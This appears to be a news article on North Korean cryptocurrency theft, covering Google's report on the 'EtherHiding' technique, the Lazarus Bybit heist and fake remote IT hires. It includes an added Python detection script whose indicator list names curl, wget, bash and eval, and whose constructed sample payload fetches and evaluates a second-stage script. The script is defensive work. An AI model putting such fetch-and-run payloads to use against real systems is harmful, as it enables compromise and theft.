Google: North Korean Hackers Attempted Cryptocurrency Theft, Funds Likely Used for Nuclear Weapons Development
Hidden Malware in Decentralized and Public Blockchains
Developers Tricked into Installing “Malicious Commands”
In February, 400,000 Ethereum Stolen from Bybit

Evidence has emerged indicating that North Korean hacker groups attempted to steal cryptocurrency, just eight months after breaching a supplier of Bybit, the world’s second-largest crypto exchange, in February and executing one of the largest cryptocurrency heists in history. As crypto theft has become a key source of foreign currency revenue for North Korea, the attackers are expanding their targets by infiltrating U.S. tech firms through fake employment and exploiting individual investors with weak security defenses. The funds stolen by these groups are estimated to amount to roughly 13% of North Korea’s GDP and are believed to be used primarily for the development of nuclear and other weapons of mass destruction.
Multi-Stage Malware Infection Process
On October 19 (local time), Google’s Threat Intelligence Group (GTIG) reported that the North Korea-linked threat group UNC5342 had been discovered attempting to steal cryptocurrency and collect sensitive information by deceiving developers through social engineering and tricking them into installing malicious code themselves. This new attack method, known as “EtherHiding,” hides malicious commands within blockchain transactions or smart contracts, which are then remotely executed. It marks the first known instance of a state-sponsored threat actor concealing malware through public, decentralized blockchains.
The attack compromised systems across multiple operating systems, including Windows, macOS, and Linux, through a multi-stage infection procedure. The attackers stored malicious commands on blockchain networks and retrieved them via read-only access, making it difficult to trace or block the command delivery. By leveraging the immutable nature of blockchains, they concealed command structures to evade traditional security detection systems while maintaining anonymity. Additionally, the attackers were able to dynamically modify the payload, allowing for long-term, persistent threat operations.
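The detail that matters for defenders in the description above is the read-only retrieval: on Ethereum-style chains a read-only contract query (the JSON-RPC `eth_call` method) is never mined into a block, costs no gas and leaves no on-chain record, so the only place it can be observed is the RPC or network boundary of the developer workstation. The script below is an added example, not code from Google's report or from any of the groups it names. It takes constructed JSON-RPC traffic in the shape a proxy or endpoint sensor might log (one request or response object per line; that log format, the contract addresses, the `0xdeadbeef` selector and the payload text are all assumptions made for this example), ABI-decodes any `eth_call` result that looks like a Solidity `string`, and flags results that come back from a contract outside the organisation's allowlist or that contain script-like content. The `0x06fdde03` selector is the real ERC-20 `name()` selector and serves as the benign control case.

```python
import json
import re

# Constructed addresses for the sample traffic (not real contracts).
ERC20_CONTRACT = "0x" + "11" * 20      # allowlisted token contract
UNKNOWN_CONTRACT = "0x" + "22" * 20    # contract the organisation never approved

# Patterns that should never appear in a string a developer's tooling reads from
# a contract; tune for your environment.
SCRIPT_INDICATORS = [
    r"\beval\s*\(", r"\bnew\s+Function\s*\(", r"child_process",
    r"\bpowershell\b", r"\bcurl\b", r"\bwget\b", r"\bbash\s+-c\b",
    r"https?://", r"\bbase64\b",
]


def abi_encode_string(s: str) -> str:
    """ABI-encode one dynamic `string` return value (offset, length, padded data).
    Used only to build the constructed sample responses below."""
    raw = s.encode()
    head = (32).to_bytes(32, "big")
    length = len(raw).to_bytes(32, "big")
    padded = raw + b"\x00" * ((32 - len(raw) % 32) % 32)
    return "0x" + (head + length + padded).hex()


def abi_decode_string(hexdata: str):
    """Decode one ABI `string` return value; return None if the layout does not fit."""
    try:
        data = bytes.fromhex(hexdata.removeprefix("0x"))
    except ValueError:
        return None
    if len(data) < 64:
        return None
    offset = int.from_bytes(data[:32], "big")
    if offset + 32 > len(data):
        return None
    length = int.from_bytes(data[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(data):
        return None
    try:
        return data[start:start + length].decode("utf-8")
    except UnicodeDecodeError:
        return None


def build_sample_log() -> str:
    """Constructed JSON-RPC traffic, one JSON object per line (assumed log format)."""
    token_name = abi_encode_string("Example Token")
    payload = abi_encode_string('var u="https://example.invalid/stage2.js"; eval(load(u));')
    lines = [
        {"direction": "request", "id": 1, "method": "eth_blockNumber", "params": []},
        {"direction": "response", "id": 1, "result": "0x1234"},
        {"direction": "request", "id": 2, "method": "eth_call",
         "params": [{"to": ERC20_CONTRACT, "data": "0x06fdde03"}, "latest"]},  # name()
        {"direction": "response", "id": 2, "result": token_name},
        {"direction": "request", "id": 3, "method": "eth_call",
         "params": [{"to": UNKNOWN_CONTRACT, "data": "0xdeadbeef"}, "latest"]},  # placeholder selector
        {"direction": "response", "id": 3, "result": payload},
    ]
    return "\n".join(json.dumps(m) for m in lines)


def scan_rpc_log(log_text: str, allowed_contracts):
    """Pair eth_call requests with their responses and flag suspicious string results."""
    requests, findings = {}, []
    for line in log_text.strip().splitlines():
        if not line.strip():
            continue
        msg = json.loads(line)
        if msg.get("direction") == "request":
            requests[msg["id"]] = msg
            continue
        req = requests.get(msg.get("id"))
        if not req or req.get("method") != "eth_call":
            continue
        to = req["params"][0].get("to", "").lower()
        decoded = abi_decode_string(msg.get("result", ""))
        if decoded is None:          # not a string return; out of scope for this check
            continue
        hits = [p for p in SCRIPT_INDICATORS if re.search(p, decoded, re.IGNORECASE)]
        reasons = []
        if to not in allowed_contracts:
            reasons.append("contract not on allowlist")
        if hits:
            reasons.append("returned string contains script indicators: " + ", ".join(hits))
        # Script content is always reported; a long string from an unknown contract is
        # reported even without indicators, since payloads can be obfuscated.
        if hits or (to not in allowed_contracts and len(decoded) > 256):
            findings.append({"id": msg["id"], "contract": to,
                             "reasons": reasons, "preview": decoded[:80]})
    return findings


if __name__ == "__main__":
    for f in scan_rpc_log(build_sample_log(), {ERC20_CONTRACT}):
        print(json.dumps(f, indent=2))
```

The allowlist is the load-bearing control: a developer's tooling normally talks to a small, known set of contracts, so any `eth_call` to an address outside that set is worth a look even before the content is decoded. Because the attacker can update the contract's stored data at will, blocking the decoded payload's current indicators is weaker than restricting which contracts and RPC endpoints developer machines may query in the first place.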
FBI Issues Wanted Notice for Lazarus Group Hackers
The Lazarus Group, one of North Korea’s most notorious hacker collectives alongside UNC5342, was responsible for the February breach of Bybit’s supplier that resulted in the theft of 401,000 Ethereum. The hackers exploited the process of transferring Ethereum from Bybit’s cold wallet to its hot wallet, deceiving the exchange into believing the transaction was legitimate, when in fact the funds were sent to a wallet controlled by Lazarus. According to blockchain security firm Elliptic, the incident ranks as the largest cryptocurrency theft ever recorded.
After the breach, Bybit offered a bounty and worked to prevent the stolen Ethereum from being liquidated. The exchange has since managed to recover and freeze $40 million in assets, but a significant portion is believed to have already been converted to cash. The BBC reported that Lazarus had stolen approximately $1.46 billion worth of cryptocurrency, with at least $300 million already laundered. Experts assess that given North Korea’s advanced hacking and money-laundering capabilities, recovering the remaining assets is highly unlikely.
Affiliated with North Korea’s Reconnaissance General Bureau, Lazarus first gained international notoriety in 2014 by hacking Sony Pictures in retaliation for a film satirizing Kim Jong-un. The group was also behind the 2016 Bangladesh Central Bank heist and the 2017 WannaCry ransomware attack, which infected over 200,000 computers across 150 countries. Park Jin-hyok, who led these operations, was placed on the FBI’s most wanted list in 2018. More recently, the group has been linked to the May Solana hack, in which $3.2 million was stolen.

$2 Billion Stolen from Individual Investors
As cryptocurrency theft becomes a major tool for circumventing international sanctions and generating foreign currency, North Korea’s attacks have expanded from corporations to individual investors. Wealthy individuals with weaker security protections have become prime targets. Blockchain cybersecurity firm TRM Labs estimates that in 2025 alone, North Korean hackers stole more than $2 billion worth of cryptocurrency from high-net-worth investors. This figure amounts to roughly 13% of North Korea’s GDP, and the funds are believed to be used for the development of nuclear and other weapons of mass destruction (WMDs).
There has also been a rise in cases where North Koreans infiltrate IT firms directly by securing employment. Some of these companies are said to include major global corporations. In June, the U.S. Department of Justice indicted four North Koreans who had obtained employment at American technology firms and systematically embezzled cryptocurrency. Using stolen personal identification data, they fabricated false identities to secure jobs, then siphoned off the firms’ managed crypto assets and laundered the proceeds. These individuals reportedly gained profits worth hundreds of thousands of dollars from their hacking operations.
The hackers’ activity has also expanded beyond the U.S. to Europe and Asia. GTIG warned, “North Korean hackers are increasingly disguising themselves as remote freelancers to infiltrate European firms,” adding, “North Korean workers can now be employed virtually anywhere in the world.” On October 2, Japan’s SBI Holdings reportedly suffered losses of $21 million due to a North Korean-linked crypto theft. SBI Holdings, one of Japan’s largest financial groups, had recorded an all-time high of $810 million in virtual asset division revenue during the second quarter.